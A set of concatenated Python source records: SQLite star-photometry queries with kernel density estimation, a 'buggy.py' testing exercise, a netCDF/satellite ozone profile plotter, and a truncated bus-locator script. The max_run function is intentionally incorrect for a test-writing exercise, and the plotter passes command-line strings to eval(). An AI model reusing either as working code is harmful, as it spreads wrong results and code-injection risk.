i.ID\n\t\t\t\t\tWHERE i.Filter = 'H') h\n\t\t\t\tON j.StarID = h.StarID\n\t\t\t\tWHERE j.Mag1 - h.Mag1 > 1.5\n\t\t\t\tGROUP BY j.StarID\n\t\t\t\t\"\"\"\n\t\t\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\tmakeHistogram(data, ['StarID', 'J - H'], 'R2')\n\ndef R3():\n\t\"\"\"\n\tTest query R3\n\t\"\"\"\n\tprint('Warning: this query might take very long')\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT f.StarID, f.Flux1\n\t\t\t\tFROM FluxData f \n\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\tWHERE i.Filter = 'Ks' AND ABS(\n\t\t\t\t\tf.Flux1 - (\n\t\t\t\t\tSELECT AVG(f2.Flux1)\n\t\t\t\t\tFROM FluxData f2\n\t\t\t\t\tJOIN FieldInfo i2 ON f2.ID = i2.ID\n\t\t\t\t\tWHERE f.StarID = f2.StarID AND i2.Filter = 'Ks'\n\t\t\t\t\t)) > (20 * f.dFlux1)\n\t\t\t\tGROUP BY f.StarID\n\t\t\t\t\"\"\"\n\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\t#save the data to a csv file\n\t\tsaveResults(data, 'R3')\n\n\t\t#it is also possible to load the results from a file, as the query takes\n\t\t#very long to run\n\t\t# data = pd.read_csv('./Query_results/R3_results.csv')\n\t\t\n\t\tmakeHistogram(data, ['StarID', 'Ks flux'], 'R3')\n\ndef R4(fieldid = 1):\n\t\"\"\"\n\tTest query R4. Catalogue = image\n\t\"\"\"\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT ID\n\t\t\t\tFROM FieldInfo\n\t\t\t\tWHERE FieldID = {0}\n\t\t\t\t\"\"\".format(fieldid)\n\n\t\t\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\tprint(data)\n\n\t\t#save the data to a csv file\n\t\tsaveResults(data, 'R4')\n\ndef R5(fieldid = 1):\n\t\"\"\"\n\tTest query R5. The Ks magnitudes are averaged per field.\n\n\tInput:\n\t\tfieldid (int): ID of the field of which the Y, Z, J, H and Ks magnitudes\n\t\tshould be obtained.\n\t\"\"\"\n\t#names of the filters\n\tnames = ['Y', 'Z', 'J', 'H', 'Ks']\n\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT Y.Mag1, Z.Mag1, J.Mag1, H.Mag1, Ks.AvgMag1\n\t\t\t\tFROM (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID, f.Class\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'Y' AND f.Flux1/f.dFlux1 > 30) Y\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'Z' AND f.Flux1/f.dFlux1 > 30\n\t\t\t\t) Z On Y.StarID = Z.StarID AND Y.FieldID = Z.FieldID\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'J' AND f.Flux1/f.dFlux1 > 30\n\t\t\t\t) J On Y.StarID = J.StarID AND Y.FieldID = J.FieldID\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'H' AND f.Flux1/f.dFlux1 > 30\n\t\t\t\t) H On Y.StarID = H.StarID AND Y.FieldID = H.FieldID\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT AVG(f.Mag1) AS AvgMag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'Ks' AND f.Flux1/f.dFlux1 > 30\n\t\t\t\t\tGROUP BY f.StarID, i.ID\n\t\t\t\t) Ks On Y.StarID = Ks.StarID AND Y.FieldID = Ks.FieldID\n\t\t\t\tWHERE Y.FieldID = {0} AND Y.Class = -1\n\t\t\t\t\"\"\".format(fieldid)\n\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\tmakeKDE(data, names, 'R5')\n\ndef loadYJHdata(SN = 10):\n\t\"\"\"\n\tLoad the Y - J and J - H colours of all the stars in the database with\n\tSN > 8.\n\n\tInput:\n\t\tSN (int): signal to noise threshold. Default = 10.\n\n\tOutput:\n\t\tdata (pandas dataframe): the data obtained from the query\n\t\"\"\"\n\t#names of the filters\n\tnames = ['Y - J', 'J - H']\n\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT Y.Mag1 - J.Mag1, J.Mag1 - H.Mag1\n\t\t\t\tFROM (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'Y' AND f.Flux1/f.dFlux1 > {0}) Y\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID, f.Class\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'J' AND f.Flux1/f.dFlux1 > {0}\n\t\t\t\t) J On Y.StarID = J.StarID AND Y.FieldID = J.FieldID\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'H' AND f.Flux1/f.dFlux1 > {0}\n\t\t\t\t) H On Y.StarID = H.StarID AND Y.FieldID = H.FieldID AND J.Class = -1\n\t\t\t\t\"\"\".format(SN)\n\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\t#rename the columns of the dataframe\n\t\tdata.columns = names\n\t\t#remove all none or nan values\n\t\tdata = data.dropna()\n\n\t\tprint('Number of data points: {0}'.format(len(data[names[0]])))\n\n\t\treturn data\n\ndef make2D_KDE(X, n_samp = 1e5, bandwidth = None, n_folds = 3, bw_train_size = 1000, bw_range_size = 20, doplot = True):\n\t\"\"\"\n\tMake a 2D Kernel Density Estimation and draw a n_samp number of samples from it\n\tbest bandwidth obtained from previous runs\n\tbandwidth = 0.0546938775510204\n\tbandwidth = 0.05894736842105264\n\n\tInput:\n\t\tX (2D numpy array): the training data, consisting of the Y - J and J - H \n\t\tcolours.\\n\n\t\tn_samp (int): the number of samples to draw from the KDE. Default = 100000.\\n\n\t\tbandwidth (float): the bandwidth to use for the KDE from which the samples\n\t\twill be drawn. Set to None to let the script find the best bandwidth. \n\t\tDefault = None.\\n\n\t\tn_folds (int): the number of folds to use when determining the bandwidth.\\n\n\t\tbw_train_size (int): size of the training set that will be used to \n\t\tdetermine the best bandwidth. Default = 1000.\\n\n\t\tbw_range_size (int); the amount of bandwidths to try out in the interval\n\t\t0.04 to 0.1. Default = 20.\\n\n\t\tdoplot (boolean): whether to make a hex-bin plot of the drawn samples or\n\t\tnot. Default = True.\n\n\tOutput:\n\t\tsamples (2D numpy array): the samples drawn from the KDE.\n\t\"\"\"\n\timport matplotlib.pyplot as plt\n\timport seaborn as sns\n\tfrom sklearn.neighbors import KernelDensity\n\tfrom sklearn.model_selection import KFold\n\tfrom matplotlib import rcParams\n\trcParams['font.family'] = 'Latin Modern Roman'\n\tfrom matplotlib.colors import LogNorm\n\n\t#shuffle the data\n\tnp.random.shuffle(X)\n\n\t#determine the best bandwidth if it is not provided\n\tif bandwidth == None:\n\t\t#first we find the optimum bandwidth\n\t\tkf = KFold(n_splits = n_folds)\n\n\t\t#range of bandwidths to try\n\t\tbwrange = np.linspace(0.02, 0.08, bw_range_size)\n\t\t#the array which will store the likelyhood\n\t\tlikelyhood = np.zeros(len(bwrange))\n\t\t\n\t\tprint('Finding the best bandwidth...')\n\t\tfor bw, i in zip(bwrange, np.arange(len(bwrange))):\n\t\t\tprint('Iteration {0}, bandwidth {1}'.format(i, bw))\n\t\t\tlh = []\n\t\t\t#split the data into a train and test set using only the first 1000 samples\n\t\t\tfor train_i, test_i in kf.split(X[:,:bw_train_size]):\n\t\t\t\tXtrain, Xtest = X[train_i], X[test_i]\n\t\t\t\tkde = KernelDensity(bandwidth = bw, kernel = 'gaussian').fit(Xtrain)\n\n\t\t\t\tlhscore = kde.score(Xtest)\n\t\t\t\t\n\t\t\t\tlh = np.append(lh, lhscore)\n\n\t\t\t\tprint('Bandwidth: {0}, score: {1}'.format(bw, lhscore))\n\t\t\t\t\n\t\t\tlikelyhood[i] = np.mean(lh)\n\n\t\tplt.plot(bwrange, likelyhood)\n\t\tplt.xlabel('Bandwidth')\n\t\tplt.ylabel('Likelyhood')\n\t\tplt.title('KDE likelyhood for different bandwidths')\n\t\tplt.savefig('2D_KDE_likelyhood_run4.png', dpi = 300)\n\t\tplt.close()\n\n\n\t\t#find the bandwidth which gave the highest likelyhood\n\t\tbandwidth = bwrange[np.argmax(likelyhood)]\n\n\t\tprint('Best bandwidth: {0}'.format(bandwidth))\n\n\tkde = KernelDensity(bandwidth = bandwidth, kernel = 'gaussian').fit(X)\n\n\t#pull samples from the kde\n\tsamples = kde.sample(int(n_samp))\n\t\n\t#plot the samples in a hexbin plot\n\tif doplot:\n\t\tplt.hexbin(samples[:, 0], samples[:, 1], bins = 'log', cmap = 'Reds')\n\t\tplt.colorbar(label = 'Density of samples [logarithmic]')\n\n\t\tplt.xlabel('Y - J')\n\t\tplt.ylabel('J - H')\n\t\tplt.title('Distribution of samples in (Y-J, J-H) colour space')\n\t\tplt.savefig('Samples_distribution_hex.pdf', dpi = 300)\n\t\tplt.show()\n\n\treturn samples\n\t\n\ncreateDB()\nfillDataBase()\nR1()\n\n\n#load the data as a pandas dataframe\n# df = loadYJHdata()\n\n#input the data as a numpy array and receive the 100000 samples\n# samples = make2D_KDE(np.array([df['Y - J'], df['J - H']]).T, bandwidth = 0.0389474)\n","sub_path":"FinalProject/Q1/finalproject_Q1.py","file_name":"finalproject_Q1.py","file_ext":"py","file_size_in_byte":15406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"75218658","text":"\"\"\"This function has two bugs.\nYour mission is to write a test\nsuite that uncovers both.\n\"\"\"\nfrom typing import Tuple\n\ndef max_run(l: list) -> list:\n \"\"\"Returns the longest 'run' in the list.\n Example: max_run([ 1, 1, 2, 2, 2, 3, 3 ]\n returns [2, 2, 2]\n \"\"\"\n cur_item = l[0]\n longest = []\n cur_run = []\n for item in l:\n if item == cur_item:\n cur_run.append(item)\n else:\n if len(cur_run) > len(longest):\n longest = cur_run\n cur_run = [ item ]\n cur_item = item\n return longest\n\n\n\n\n","sub_path":"buggy.py","file_name":"buggy.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"127208223","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport sys\nimport numpy as np\nfrom warnings import warn\nfrom netCDF4 import MFDataset, Dataset\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom glob import glob\nunitconvert = {('ppmV', 'ppb'): lambda x: x * 1000.}\n\ndef maskfilled(v):\n return np.ma.masked_values(v[:], v.attrs['_FillValue'])\n\ndef plot_omi(ax, lon_bnds, lat_bnds, omipaths, key = 'O3Profile', airden = None, airdenvert = None):\n import h5py\n from scipy.constants import Avogadro\n allx = []\n ally = []\n lon_bnds = lon_bnds[:]\n lat_bnds = lat_bnds[:]\n if len(omipaths) == 0:\n return None, None\n \n omipaths = reduce(list.__add__, [glob(i) for i in omipaths])\n omipaths.sort()\n for path in omipaths:\n print(path)\n f = h5py.File(path, mode = 'r')\n swaths = f['HDFEOS']['SWATHS'][key]\n latsv = swaths['Geolocation Fields']['Latitude']\n lonsv = swaths['Geolocation Fields']['Longitude']\n lats = maskfilled(latsv).reshape(-1, 1)\n lons = maskfilled(lonsv).reshape(-1, 1)\n inboth = matchspace(lons, lats, lon_bnds, lat_bnds)\n if inboth.filled(False).sum(0) > 0: \n print('******** FOUND ******', path)\n pressurev = swaths['Geolocation Fields']['Pressure']\n altitudev = swaths['Geolocation Fields']['Altitude']\n nk = pressurev.shape[-1]\n speciesv = swaths['Data Fields']['O3']\n species = maskfilled(speciesv).reshape(-1, nk -1)\n\n # Pressure is from top to bottom\n pressure = maskfilled(pressurev).reshape(-1, nk)\n altitude = maskfilled(altitudev).reshape(-1, nk)\n dz = -(altitude[:, 1:] - altitude[:, :-1]) * 1000. * 100.\n #Lacis 1990 1 DU = 2.69e16 molecules cm-2\n species = species * .001 / dz # cm /cm # vrm\n x = pressure[inboth]\n y = species[inboth]\n allx.append(x)\n ally.append(y)\n else:\n warn('No data found for %s: lons (%s, %s) and lats (%s, %s); lonbs (%s, %s) and latbs (%s, %s);' % (path, lons.min(), lons.max(), lats.min(), lats.max(), lon_bnds.min(), lon_bnds.max(), lat_bnds.min(), lat_bnds.max()))\n \n if len(allx) == 0:\n print('*' * 80 + '\\n\\nNo OMI DATA FOUND AT ALL\\n\\n' + '*'*80)\n return None, None\n \n var = np.ma.masked_values(np.ma.concatenate(ally, axis = 0), -999.) * 1e9\n var = var.reshape(-1, var.shape[-1])\n vertcrd = np.ma.masked_values(np.ma.concatenate(allx, axis = 0), -999.).mean(0) #.reshape(-1, 2).mean(1)\n omil, omir = minmaxmean(ax, var.T.repeat(2, 0), vertcrd.repeat(2, 0)[1:-1], ls = '-', lw = 2, color = 'b', facecolor = 'b', edgecolor = 'b', alpha = .2, zorder = 5, label = 'OMI')\n ax.text(.05, .7, 'OMI = %d' % var.shape[0], transform = ax.transAxes)\n return omil, omir\n\n\ndef matchspace(lons, lats, lon_bnds, lat_bnds):\n inlon = np.logical_and(lons >= lon_bnds[None, :, 0], lons <= lon_bnds[None, :, 1])\n inlat = np.logical_and(lats >= lat_bnds[None, :, 0], lats <= lat_bnds[None, :, 1])\n inboth = np.logical_and(inlon, inlat).any(1)\n return inboth\n\ndef plot_tes(ax, lon_bnds, lat_bnds, tespaths):\n from netCDF4 import Dataset\n allx = []\n ally = []\n lon_bnds = lon_bnds[:]\n lat_bnds = lat_bnds[:]\n if len(tespaths) == 0:\n return None, None\n tespaths = reduce(list.__add__, [glob(i) for i in tespaths])\n tespaths.sort()\n for path in tespaths:\n f = Dataset(path)\n lats = f.variables['latitude'][:][:, None]\n lons = f.variables['longitude'][:][:, None]\n pressure = f.variables['pressure']\n species = f.variables['species']\n inboth = matchspace(lons, lats, lon_bnds, lat_bnds)\n if inboth.sum(0) > 0: \n print('******** FOUND ******', path)\n x = pressure[inboth]\n y = species[inboth]\n allx.append(x)\n ally.append(y)\n else:\n warn('No data found for %s' % path)\n \n if len(allx) == 0:\n return None, None\n var = np.ma.masked_values(np.ma.concatenate(ally, axis = 0), -999.) * 1e9\n var = var.reshape(-1, var.shape[-1])\n vertcrd = np.ma.masked_values(np.ma.concatenate(allx, axis = 0), -999.).mean(0)\n tesl, tesr = minmaxmean(ax, var.T, vertcrd, ls = '-', lw = 2, color = 'r', facecolor = 'r', edgecolor = 'r', alpha = .2, zorder = 2, label = 'TES')\n ax.text(.05, .8, 'TES = %d' % var.shape[0], transform = ax.transAxes)\n return tesl, tesr\n\ndef minmaxmean(ax, vals, vertcrd, **kwds):\n minval = vals.min(1)\n meanval = vals.mean(1)\n maxval = vals.max(1)\n linekwds = kwds.copy()\n linekwds['color'] = linekwds.pop('facecolor')\n linekwds.pop('edgecolor')\n linekwds.pop('alpha')\n fillkwds = kwds.copy()\n fillkwds['ls'] = 'solid'\n \n line, = ax.plot(meanval, vertcrd, **linekwds)\n\n x = np.ma.concatenate([minval[:vertcrd.size], maxval[:vertcrd.size][::-1]])\n y = np.ma.concatenate([vertcrd[:], vertcrd[::-1]])\n mask = x.mask | y.mask\n x = np.ma.masked_where(mask, x).compressed()\n y = np.ma.masked_where(mask, y).compressed()\n range, = ax.fill(x, y, **fillkwds)\n return line, range\n\ndef plot(ifiles, args):\n from PseudoNetCDF.coordutil import getsigmamid, getpresmid, gettimes\n import pylab as pl\n from pylab import figure, NullFormatter, close, rcParams\n rcParams['text.usetex'] = False\n from matplotlib.colors import LinearSegmentedColormap, BoundaryNorm, LogNorm\n scale = args.scale;\n minmax = eval(args.minmax)\n minmaxq = eval(args.minmaxq)\n sigma = args.sigma\n maskzeros = args.maskzeros\n outunit = args.outunit\n tespaths = args.tespaths\n omipaths = args.omipaths\n edges = args.edges\n try:\n f, = ifiles\n except:\n raise ValueError('curtain plot expects one file when done. Try stack time --stack=time to concatenate')\n\n # Add CF conventions if necessary\n if 'latitude_bounds' not in f.variables.keys():\n try:\n from PseudoNetCDF import getvarpnc\n from PseudoNetCDF.conventions.ioapi import add_cf_from_ioapi\n f = getvarpnc(f, None)\n add_cf_from_ioapi(f)\n except:\n pass\n if sigma:\n vertcrd = getsigmamid(f)\n else:\n vertcrd = getpresmid(f, pref = 101325., ptop = getattr(f, 'VGTOP', 10000))\n if vertcrd.max() > 2000: vertcrd /= 100.\n\n try:\n lonb = f.variables['geos_longitude_bounds']\n latb = f.variables['geos_latitude_bounds']\n except:\n lonb = f.variables['longitude_bounds']\n latb = f.variables['latitude_bounds']\n for var_name in args.variables:\n temp = defaultdict(lambda: 1)\n try:\n eval(var_name, None, temp)\n var = eval(var_name, None, f.variables)[:]\n except:\n temp[var_name]\n var = f.variables[var_name][:]\n if maskzeros: var = np.ma.masked_values(var, 0)\n unit = f.variables[temp.keys()[0]].units.strip()\n if unit in unitconvert:\n var = unitconvert.get((unit, outunit), lambda x: x)(var)\n else:\n outunit = unit\n bmap = None\n vmin, vmax = np.percentile(np.ma.compressed(var).ravel(), list(minmaxq))\n if minmax[0] is not None:\n vmin = minmax[0]\n if minmax[1] is not None:\n vmax = minmax[1]\n if edges:\n fig = pl.figure(figsize = (16, 4))\n offset = 0.05\n ax = fig.add_axes([.1 - offset, .15, .22, .725])\n ax = fig.add_axes([.325 - offset, .15, .22, .725])\n ax = fig.add_axes([.55 - offset, .15, .22, .725])\n ax = fig.add_axes([.775 - offset, .15, .22, .725])\n ss = 0\n se = ss + f.NCOLS + 1\n es = se\n ee = se + f.NROWS + 1\n ns = ee\n ne = ee + f.NCOLS + 1\n ws = ne\n we = ws + f.NROWS + 1\n axs = fig.axes\n for ax in fig.axes[1:]:\n ax.yaxis.set_major_formatter(pl.NullFormatter())\n \n vars = [var[:, :, ss:se], var[:, :, es:ee], var[:, :, ns:ne][:, :, ::-1], var[:, :, ws:we][:, :, ::-1]]\n lonbss = [lonb[ss:se], lonb[es:ee], lonb[ns:ne][::-1], lonb[ws:we][::-1]]\n latbss = [latb[ss:se], latb[es:ee], latb[ns:ne][::-1], latb[ws:we][::-1]]\n \n else:\n fig = pl.figure(figsize = (8, 4))\n ax = fig.add_axes([.1, .15, .8, .725])\n axs = fig.axes\n vars = [var]\n lonbss = [lonb[:]]\n latbss = [latb[:]]\n for ax, var, lonbs, latbs in zip(axs, vars, lonbss, latbss):\n vals = var.swapaxes(0, 1).reshape(var.shape[1], -1)\n ax.text(.05, .9, 'n = %d' % vals.shape[1], transform = ax.transAxes)\n modl, modr = minmaxmean(ax, vals, vertcrd, facecolor = 'k', edgecolor = 'k', alpha = .2, zorder = 4, label = 'GC', ls = '-', lw = 2, color = 'k')\n llines = [(modl, modr)]\n ymin, ymax = vertcrd.min(), vertcrd.max()\n ax.set_ylim(ymax, ymin)\n ax.set_xscale(scale)\n ax.set_xlim(vmin, vmax)\n #if scale == 'log':\n # ax.set_xticklabels(['%.1f' % (10**x) for x in ax.get_xticks()])\n \n if 'TFLAG' in f.variables.keys():\n SDATE = f.variables['TFLAG'][:][0, 0, 0]\n EDATE = f.variables['TFLAG'][:][-1, 0, 0]\n STIME = f.variables['TFLAG'][:][0, 0, 1]\n ETIME = f.variables['TFLAG'][:][-1, 0, 1]\n if SDATE == 0:\n SDATE = 1900001\n EDATE = 1900001\n sdate = datetime.strptime('%07d %06d' % (SDATE, STIME), '%Y%j %H%M%S')\n edate = datetime.strptime('%07d %06d' % (EDATE, ETIME), '%Y%j %H%M%S')\n elif 'tau0' in f.variables.keys():\n sdate = datetime(1985, 1, 1, 0) + timedelta(hours = f.variables['tau0'][0])\n edate = datetime(1985, 1, 1, 0) + timedelta(hours = f.variables['tau1'][-1])\n else:\n times = gettimes(f)\n sdate = times[0]\n edate = times[-1]\n\n if len(tespaths) > 0:\n tesl, tesr = plot_tes(ax, lonbs, latbs, tespaths)\n if not tesl is None:\n llines.append((tesl, tesr))\n if len(omipaths) > 0:\n omil, omir = plot_omi(ax, lonbs, latbs, omipaths, airden = f.variables['AIRDEN'][:].mean(0).mean(1), airdenvert = vertcrd)\n if not omil is None:\n llines.append((omil, omir))\n\n try:\n title = '%s to %s' % (sdate.strftime('%Y-%m-%d'), edate.strftime('%Y-%m-%d'))\n except:\n title = var_name\n if sigma:\n axs[0].set_ylabel('sigma')\n else:\n axs[0].set_ylabel('pressure')\n \n xmax = -np.inf\n xmin = np.inf\n for ax in fig.axes:\n tmp_xmin, tmp_xmax = ax.get_xlim()\n xmax = max(tmp_xmax, xmax)\n xmin = min(tmp_xmin, xmin)\n for ax in fig.axes:\n ax.set_xlim(xmin, xmax)\n \n if len(axs) == 1:\n axs[0].set_xlabel('%s %s' % (var_name, outunit))\n else:\n axs[0].set_xlabel('South')\n axs[1].set_xlabel('East')\n axs[2].set_xlabel('North')\n axs[3].set_xlabel('West')\n fig.text(.5, .90, '%s %s' % (var_name, outunit), horizontalalignment = 'center', fontsize = 16)\n nl = 0\n for ax in axs:\n if len(ax.get_lines()) > nl:\n nl = len(ax.get_lines())\n pl.sca(ax)\n \n llabels = [l[0].get_label() for l in llines]\n pl.legend(llines, llabels, bbox_to_anchor = (.1, 1), loc = 'upper left', bbox_transform = fig.transFigure, ncol = 6)\n if edges:\n fig.text(0.95, 0.975, title, horizontalalignment = 'right', verticalalignment = \"top\", fontsize = 16)\n else:\n fig.text(0.95, 0.025, title, horizontalalignment = 'right', verticalalignment = \"bottom\", fontsize = 16)\n fig.savefig('%s_%s.%s' % (args.outpath, var_name, args.figformat))\n pl.close(fig)\n return fig\n\nif __name__ == '__main__':\n from PseudoNetCDF.pncparse import getparser, pncparse\n \n parser = getparser(has_ofile = True, plot_options = True, interactive = False)\n\n parser.add_argument(\"--sigma\", dest = \"sigma\", action = \"store_true\", default = False,\n help = \"Plot on sigma coordinate instead of pressure\")\n\n parser.add_argument(\"--scale\", dest = \"scale\", type = str, default = 'log',\n help = \"Defaults to log, but linear and semilog are also options.\")\n\n parser.add_argument(\"--minmax\", dest = \"minmax\", type = str, default = \"None,None\",\n help = \"Use values to set range (xmin, xmax); defaults None,None.\")\n\n parser.add_argument(\"--mask-zeros\", dest = \"maskzeros\", action = \"store_true\", default = False,\n help = \"Defaults False.\")\n\n parser.add_argument(\"--minmaxq\", dest = \"minmaxq\", type = str, default = '0,100',\n help = \"Use quartiles to set range (xmin, xmax); defaults 0,100.\")\n\n parser.add_argument(\"--out-unit\", dest = \"outunit\", type = str, default = 'ppb',\n help = \"Defaults ppb.\")\n\n parser.add_argument(\"--tes-paths\", dest = \"tespaths\", type = str, default = [], action = \"append\",\n help = \"Plot tes on top of boundary from paths; defaults to []\")\n\n parser.add_argument(\"--omi-paths\", dest = \"omipaths\", type = str, default = [], action = \"append\",\n help = \"Plot omi on top of boundary from paths; defaults to []\")\n\n parser.add_argument(\"--itertime\", dest = \"itertime\", default = False, action = 'store_true',\n help = \"Iterate over times and plot each one.\")\n \n parser.add_argument(\"--edges\", dest = \"edges\", default = False, action = \"store_true\",\n help = \"Plot S,E,N,W edges instead of a single plot.\")\n parser.epilog = \"\"\"\nExample:\n $ pncvertprofile.py outputs/ts20120301.bpch.BCON.nc test_profile -v O3 --edges --minmaxq .5,99.5 --tes-paths=~/Data/test/*\n\"\"\"\n \n ifiles, args = pncparse(has_ofile = True, parser = parser)\n if args.variables is None:\n raise ValueError('User must specify variable(s) to plot:\\n%s' % '\\n\\t'.join(ifiles[0].variables.keys()))\n if len(args.tespaths) > 0:\n args.tespaths = reduce(list.__add__, [tp.split(',') for tp in args.tespaths])\n \n if len(args.omipaths) > 0:\n args.omipaths = reduce(list.__add__, [op.split(',') for op in args.omipaths])\n plot(ifiles, args)\n","sub_path":"scripts/pncvertprofile.py","file_name":"pncvertprofile.py","file_ext":"py","file_size_in_byte":14890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"642334244","text":"#!/usr/bin/python3\nfrom datetime import datetime\nimport math\nimport os\nimport xml.etree.ElementTree as ET\n\nfrom cvtdBusLocator import CvtdBusLocator\nfrom cvtdBusPosition import CvtdBusPosition\nfrom cvtdContainedRoadPoint import ContainedRoadPoint\nfrom cvtdMap import CvtdMap\nfrom cvtdNode import CvtdNode\nfrom cvtdRoad import CvtdRoad\nfrom cvtdRoadPoint import CvtdRoadPoint\nfrom cvtdRoute import CvtdRoute\nfrom cvtdRouteSegment import CvtdRouteSegment\nfrom cvtdUtil import CvtdUtil\nimport direction\nfrom direction import Direction\n\n####\n# print_print_list prints the print list which has been sorted\n#\n# print_list see description of print_list in add_to_print_list\n# count is the number of past positions we want to print\n####\ndef print_print_list(print_list, count):\n\tfor info in print_list:\n\t\tfmt = \"{: <\" + str(2+max([len(print_list[key][0]) for key in print_list.keys()])) + \"}\"\n\t\tfmt = fmt.format(print_list[info][0])\n\t\tfor i in range(count):\n\t\t\ttry:\n\t\t\t\tfmt = fmt + \"{}: {: <\" + str(2+max([len(print_list[key][i+1][1]) for key in print_list])) + \"}{: <10}{: <3}| \"\n\t\t\t\t#print(max([print_list[key][i][0] for key in print_list]))\n\t\t\t\tfmt = fmt.format(print_list[info][i+1][0].strftime(\"%H:%M:%S\"),\n\t\t\t\t\tprint_list[info][i+1][1],\n\t\t\t\t\tstr(print_list[info][i+1][2]) + \" feet\",\n\t\t\t\t\tprint_list[info][i+1][3].short_str())\n\t\t\texcept IndexError:\n\t\t\t\tpass\n\t\tprint(fmt)\n\n####\n# add_to_print_list adds an entry to the print list for formatting and printing later\n# We use a print list so that we can compute the address of each bus, and use\n# the shortest amount of whitespace that will work with all of the buses\n# print_list is a dictionary, where bus number is a key\n# print_list[key][0] is the route name\n# print_list[key][1+j][0] is timestamp\n# print_list[key][1+j][1] is address\n# print_list[key][1+j][2] is error\n# print_list[key][1+j][3] is direction as a Direction class\n#\n# myMap is the CvtdMap, used to get list of valid streets for route \n# locator is the CvtdBusLocator\n# print_list is the print list we are adding to\n# rid is the bus route id (key into locator) that we are adding to print list\n# ix is the index into the locator's list of positions, most likely negative\n####\ndef add_to_print_list(myMap, locator, print_list, rid, ix):\n\ttry:\n\t\tposition = locator.pos[rid][ix]\n\t\tt = position.timestamp\n\t\tlat = position.lat\n\t\tlon = position.lon\n\t\tdir = position.direction\n\texcept IndexError:\n\t\treturn\n\n\t# Determine route\n\ttry:\n\t\troute = myMap.routeDict[rid]\n\t\trouteName = route.routeShortName\n\t\t# validStreets = route.get_street_list()\n\texcept KeyError:\n\t\trouteName = \"Unknown Route\"\n\t\t# validStreets = None\n\tvalidStreets = None\n\n\t# Compute address\n\t# roadIx, addr, error = myMap.compute_addr_repr(lat, lon, validStreets)\n\troadIx, addr, error = myMap.compute_addr_repr(lat, lon, None)\n\tif validStreets is not None and error > 250:\n\t\troadIx, addr_off_route, error_off_route = myMap.compute_addr_repr(lat, lon, None)\n\t\tif error_off_route < 200:\n\t\t\taddr = \"!\" + addr_off_route \n\t\t\terror = error_off_route\n\terror = round(error)\n\n\t# Determine if direction is actual or if it should be X\n\ttry:\n\t\tlat_to_lat_diff = CvtdUtil.coord_to_ft(abs(locator.pos[rid][ix - 1].lat - lat))\n\t\tlon_to_lon_diff = CvtdUtil.coord_to_ft(abs(locator.pos[rid][ix - 1].lon - lon))\n\t\tpos_to_pos_diff = math.sqrt(lat_to_lat_diff ** 2 + lon_to_lon_diff ** 2)\n\t\tif (pos_to_pos_diff < 40):\n\t\t\tdir = Direction.X\n\t\telse:\n\t\t\tdir = direction.get_direction(dir)\n\texcept IndexError:\n\t\tdir = direction.get_direction(dir)\n\n\t# Add to list to print later\n\ttry:\n\t\tprint_list[rid].append([t, addr, error, dir])\n\texcept KeyError:\n\t\tprint_list[rid] = [routeName]\n\t\tprint_list[rid].append([t, addr, error, dir])\n\n####\n# pull_data pulls the XML feed and adds new positions to the Bus Locator, also returns new positions\n#\n# key is the text to insert into the URL\n# locator is the Bus Locator where new positions will be added\n#\n# return is a set of bus route ids (keys into locator) with new data\n####\ndef pull_data(key, locator):\n\tNUM_ELEMENTS = 5\n\tnewElements = set()\n\n\tos.system(\"curl -o cvtddata.txt 